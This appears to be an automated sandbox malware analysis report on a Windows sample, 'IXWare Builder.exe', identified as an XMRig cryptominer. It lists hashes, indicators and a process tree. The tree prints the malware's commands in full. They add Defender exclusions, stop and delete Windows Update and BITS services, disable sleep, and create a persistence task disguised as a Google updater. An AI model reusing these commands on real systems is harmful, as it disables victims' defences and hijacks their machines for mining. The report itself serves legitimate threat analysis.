xmrig | 05e1988f56fe199f7e401c8f4d6ee50bb26ab34fb3f96c22de959c7e5f92de77

Analysis

max time kernel
153s
max time network
203s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
10-02-2023 23:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IXWare Builder.exe
Size

3.6MB
MD5

6a292b8ab3ff79cefe5f8e42882885d2
SHA1

cd1c59c618cb2f9d906f7214b803dd711f104f27
SHA256

05e1988f56fe199f7e401c8f4d6ee50bb26ab34fb3f96c22de959c7e5f92de77
SHA512

8288878d032221043d3bf99d78011aaab7ee744aeda4c2429cc461d34f7bffd9e091f242ca5fab84a6874e443420f436efc4367f1c776c74e0081f47418e1bab
SSDEEP

49152:NNn9hglTk53CXPgmsyL1dvIcfYNGRaKDFCC2PPGshxSZjUni1h2/MgNRIfxi3vyf:Nd9hCcigVyLPIcRaesSZy9hAx0vyq

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 1252 created 1208	1252	IXWare Builder.exe	16
PID 1252 created 1208	1252	IXWare Builder.exe	16
PID 1252 created 1208	1252	IXWare Builder.exe	16
PID 1252 created 1208	1252	IXWare Builder.exe	16
PID 1252 created 1208	1252	IXWare Builder.exe	16
PID 1636 created 1208	1636	updater.exe	16
PID 1636 created 1208	1636	updater.exe	16
PID 1636 created 1208	1636	updater.exe	16
PID 1636 created 1208	1636	updater.exe	16
PID 1636 created 1208	1636	updater.exe	16
PID 1636 created 1208	1636	updater.exe	16
PID 1892 created 1208	1892	conhost.exe	16
PID 1636 created 1208	1636	updater.exe	16

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/752-133-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/752-135-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	IXWare Builder.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 1 IoCs

pid	Process
1636	updater.exe

Loads dropped DLL 1 IoCs

pid	Process
1588	taskeng.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/752-133-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/752-135-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1636 set thread context of 1892	1636	updater.exe	79
PID 1636 set thread context of 752	1636	updater.exe	86

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	IXWare Builder.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1776	sc.exe
1368	sc.exe
316	sc.exe
2036	sc.exe
884	sc.exe
1128	sc.exe
1540	sc.exe
1520	sc.exe
1624	sc.exe
1668	sc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1924	schtasks.exe
1512	schtasks.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f077cbdeac3dd901	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1252	IXWare Builder.exe
1252	IXWare Builder.exe
856	powershell.exe
1252	IXWare Builder.exe
1252	IXWare Builder.exe
1252	IXWare Builder.exe
1252	IXWare Builder.exe
1252	IXWare Builder.exe
1252	IXWare Builder.exe
1768	powershell.exe
1252	IXWare Builder.exe
1252	IXWare Builder.exe
812	powershell.exe
1636	updater.exe
1636	updater.exe
460	powershell.exe
1636	updater.exe
1636	updater.exe
1636	updater.exe
1636	updater.exe
1636	updater.exe
1636	updater.exe
1796	powershell.exe
1636	updater.exe
1636	updater.exe
1636	updater.exe
1636	updater.exe
1892	conhost.exe
1892	conhost.exe
1636	updater.exe
1636	updater.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe
752	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 39 IoCs

description	pid	Process
Token: SeDebugPrivilege	856	powershell.exe
Token: SeShutdownPrivilege	560	powercfg.exe
Token: SeShutdownPrivilege	1844	powercfg.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeShutdownPrivilege	1016	powercfg.exe
Token: SeShutdownPrivilege	1916	powercfg.exe
Token: SeDebugPrivilege	812	powershell.exe
Token: SeDebugPrivilege	460	powershell.exe
Token: SeShutdownPrivilege	1468	powercfg.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeShutdownPrivilege	1676	powercfg.exe
Token: SeShutdownPrivilege	1348	powercfg.exe
Token: SeShutdownPrivilege	1248	powercfg.exe
Token: SeDebugPrivilege	1636	updater.exe
Token: SeAssignPrimaryTokenPrivilege	1200	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1200	WMIC.exe
Token: SeSecurityPrivilege	1200	WMIC.exe
Token: SeTakeOwnershipPrivilege	1200	WMIC.exe
Token: SeLoadDriverPrivilege	1200	WMIC.exe
Token: SeSystemtimePrivilege	1200	WMIC.exe
Token: SeBackupPrivilege	1200	WMIC.exe
Token: SeRestorePrivilege	1200	WMIC.exe
Token: SeShutdownPrivilege	1200	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1200	WMIC.exe
Token: SeUndockPrivilege	1200	WMIC.exe
Token: SeManageVolumePrivilege	1200	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1200	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1200	WMIC.exe
Token: SeSecurityPrivilege	1200	WMIC.exe
Token: SeTakeOwnershipPrivilege	1200	WMIC.exe
Token: SeLoadDriverPrivilege	1200	WMIC.exe
Token: SeSystemtimePrivilege	1200	WMIC.exe
Token: SeBackupPrivilege	1200	WMIC.exe
Token: SeRestorePrivilege	1200	WMIC.exe
Token: SeShutdownPrivilege	1200	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1200	WMIC.exe
Token: SeUndockPrivilege	1200	WMIC.exe
Token: SeManageVolumePrivilege	1200	WMIC.exe
Token: SeLockMemoryPrivilege	752	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1444 wrote to memory of 560	1444	cmd.exe	36
PID 1444 wrote to memory of 560	1444	cmd.exe	36
PID 1444 wrote to memory of 560	1444	cmd.exe	36
PID 1444 wrote to memory of 1844	1444	cmd.exe	37
PID 1444 wrote to memory of 1844	1444	cmd.exe	37
PID 1444 wrote to memory of 1844	1444	cmd.exe	37
PID 1444 wrote to memory of 1016	1444	cmd.exe	38
PID 1444 wrote to memory of 1016	1444	cmd.exe	38
PID 1444 wrote to memory of 1016	1444	cmd.exe	38
PID 1444 wrote to memory of 1916	1444	cmd.exe	39
PID 1444 wrote to memory of 1916	1444	cmd.exe	39
PID 1444 wrote to memory of 1916	1444	cmd.exe	39
PID 1160 wrote to memory of 1128	1160	cmd.exe	40
PID 1160 wrote to memory of 1128	1160	cmd.exe	40
PID 1160 wrote to memory of 1128	1160	cmd.exe	40
PID 1160 wrote to memory of 1540	1160	cmd.exe	41
PID 1160 wrote to memory of 1540	1160	cmd.exe	41
PID 1160 wrote to memory of 1540	1160	cmd.exe	41
PID 1160 wrote to memory of 1520	1160	cmd.exe	42
PID 1160 wrote to memory of 1520	1160	cmd.exe	42
PID 1160 wrote to memory of 1520	1160	cmd.exe	42
PID 1160 wrote to memory of 1624	1160	cmd.exe	43
PID 1160 wrote to memory of 1624	1160	cmd.exe	43
PID 1160 wrote to memory of 1624	1160	cmd.exe	43
PID 1160 wrote to memory of 1776	1160	cmd.exe	44
PID 1160 wrote to memory of 1776	1160	cmd.exe	44
PID 1160 wrote to memory of 1776	1160	cmd.exe	44
PID 1160 wrote to memory of 316	1160	cmd.exe	45
PID 1160 wrote to memory of 316	1160	cmd.exe	45
PID 1160 wrote to memory of 316	1160	cmd.exe	45
PID 1160 wrote to memory of 912	1160	cmd.exe	46
PID 1160 wrote to memory of 912	1160	cmd.exe	46
PID 1160 wrote to memory of 912	1160	cmd.exe	46
PID 1160 wrote to memory of 1856	1160	cmd.exe	48
PID 1160 wrote to memory of 1856	1160	cmd.exe	48
PID 1160 wrote to memory of 1856	1160	cmd.exe	48
PID 1160 wrote to memory of 1392	1160	cmd.exe	47
PID 1160 wrote to memory of 1392	1160	cmd.exe	47
PID 1160 wrote to memory of 1392	1160	cmd.exe	47
PID 1160 wrote to memory of 1344	1160	cmd.exe	49
PID 1160 wrote to memory of 1344	1160	cmd.exe	49
PID 1160 wrote to memory of 1344	1160	cmd.exe	49
PID 1768 wrote to memory of 1924	1768	powershell.exe	50
PID 1768 wrote to memory of 1924	1768	powershell.exe	50
PID 1768 wrote to memory of 1924	1768	powershell.exe	50
PID 812 wrote to memory of 1292	812	powershell.exe	53
PID 812 wrote to memory of 1292	812	powershell.exe	53
PID 812 wrote to memory of 1292	812	powershell.exe	53
PID 1588 wrote to memory of 1636	1588	taskeng.exe	55
PID 1588 wrote to memory of 1636	1588	taskeng.exe	55
PID 1588 wrote to memory of 1636	1588	taskeng.exe	55
PID 1840 wrote to memory of 1468	1840	cmd.exe	64
PID 1840 wrote to memory of 1468	1840	cmd.exe	64
PID 1840 wrote to memory of 1468	1840	cmd.exe	64
PID 1532 wrote to memory of 1368	1532	cmd.exe	65
PID 1532 wrote to memory of 1368	1532	cmd.exe	65
PID 1532 wrote to memory of 1368	1532	cmd.exe	65
PID 1840 wrote to memory of 1676	1840	cmd.exe	67
PID 1840 wrote to memory of 1676	1840	cmd.exe	67
PID 1840 wrote to memory of 1676	1840	cmd.exe	67
PID 1532 wrote to memory of 1668	1532	cmd.exe	66
PID 1532 wrote to memory of 1668	1532	cmd.exe	66
PID 1532 wrote to memory of 1668	1532	cmd.exe	66
PID 1532 wrote to memory of 884	1532	cmd.exe	68

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1208
- C:\Users\Admin\AppData\Local\Temp\IXWare Builder.exe
  "C:\Users\Admin\AppData\Local\Temp\IXWare Builder.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1252
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:856
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1160
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1128
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1540
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1520
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1624
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1776
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:316
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:912
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1392
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:1856
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1344
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1444
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:560
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1844
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1016
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xwrxi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wnaflx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:812
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:1292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:460
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1532
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1368
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1668
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:884
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:316
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2036
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:644
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1564
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:1924
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1308
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:672
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1840
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1468
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1348
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xwrxi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1796
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1512
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe zoddukej
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:1892
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:1800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:1200
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:2028
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe wjrwcbmovqiivvza 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUCyenD17wVidCED2c5Gn+a5qb+/g0b3Ur/C+iD8np6iZx06YTYzBsIDEVu0Wrk2UwuukEEjoUiiBrd9zyymwiBSMVOfeOLmGu4+IwFI7kPtb18fD92KUF+SD6W131UXXDPzDPXArhJ13MzguF0yZn/suwtDdWS9oN7NCgbeCMVEp8iLR7Tn83acj4j1k1I4EKYFs+BcFNYta25Zx0kstnjkPVvlAuPNq11iDNdVLx+huPbvoBtYNdzWxzGH9pLELi821y1t9B8CHFvXDYZkDrYcG0npYL9hV3ypJI8SxujXyy4M1ymvUFPc7gJnTamPL9nM77KCXRpQwbN4+Wo+gi4+OcyQnq5bhzCRdLHMUqoP/ZhAnfs857FDARbyjrLbW6euiNZzad8UdDxjql0Imtt1mQM4rXyXa0eHKIQhkOuFQROpv15rgMDlKU7X7vSF+gT/Igv05zsllYbZPPWD6DQ6+geZvpqiudNA9DB2QhGEmf1+uSdwiQKQruTX4crVGT
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:752

C:\Windows\system32\taskeng.exe
taskeng.exe {7D066F29-BDA6-479C-B857-56534F0AD18F} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1588
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1636

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
3.6MB

MD5
6a292b8ab3ff79cefe5f8e42882885d2

SHA1
cd1c59c618cb2f9d906f7214b803dd711f104f27

SHA256
05e1988f56fe199f7e401c8f4d6ee50bb26ab34fb3f96c22de959c7e5f92de77

SHA512
8288878d032221043d3bf99d78011aaab7ee744aeda4c2429cc461d34f7bffd9e091f242ca5fab84a6874e443420f436efc4367f1c776c74e0081f47418e1bab

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
3.6MB

MD5
6a292b8ab3ff79cefe5f8e42882885d2

SHA1
cd1c59c618cb2f9d906f7214b803dd711f104f27

SHA256
05e1988f56fe199f7e401c8f4d6ee50bb26ab34fb3f96c22de959c7e5f92de77

SHA512
8288878d032221043d3bf99d78011aaab7ee744aeda4c2429cc461d34f7bffd9e091f242ca5fab84a6874e443420f436efc4367f1c776c74e0081f47418e1bab

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
31c1811f0fb2316ca18b8c9d102bce2d

SHA1
2438b9be85870127565d0ad76aef9bbd59734440

SHA256
04b59ecfb2634f5e25ce08398f2ff1ce888a63cf675ef1f4dad3dd1513cec8a9

SHA512
f41f04871d84acb6c4582aa7a4d9b2dde332b0be38810fa27a561541fb96d711f3675ada624914e7ad9a30e352b5f725a7b564e4813d530cf0dd888b6ab23fce

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
31c1811f0fb2316ca18b8c9d102bce2d

SHA1
2438b9be85870127565d0ad76aef9bbd59734440

SHA256
04b59ecfb2634f5e25ce08398f2ff1ce888a63cf675ef1f4dad3dd1513cec8a9

SHA512
f41f04871d84acb6c4582aa7a4d9b2dde332b0be38810fa27a561541fb96d711f3675ada624914e7ad9a30e352b5f725a7b564e4813d530cf0dd888b6ab23fce

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
7b1d6a1e1228728a16b66c3714aa9a23

SHA1
8b59677a3560777593b1fa7d67465bbd7b3bc548

SHA256
3f15965d0159a818849134b3fbb016e858ac50efdf67bfcd762606ac51831bc5

SHA512
573b68c9865416ea2f9cf5c614fcedbfe69c67bd572bacec81c1756e711bd90fcfee93e17b74fb294756adf67ad18845a56c87f7f870940cbaeb3a579146a3b6

Download Submit
\Program Files\Google\Chrome\updater.exe

Filesize
3.6MB

MD5
6a292b8ab3ff79cefe5f8e42882885d2

SHA1
cd1c59c618cb2f9d906f7214b803dd711f104f27

SHA256
05e1988f56fe199f7e401c8f4d6ee50bb26ab34fb3f96c22de959c7e5f92de77

SHA512
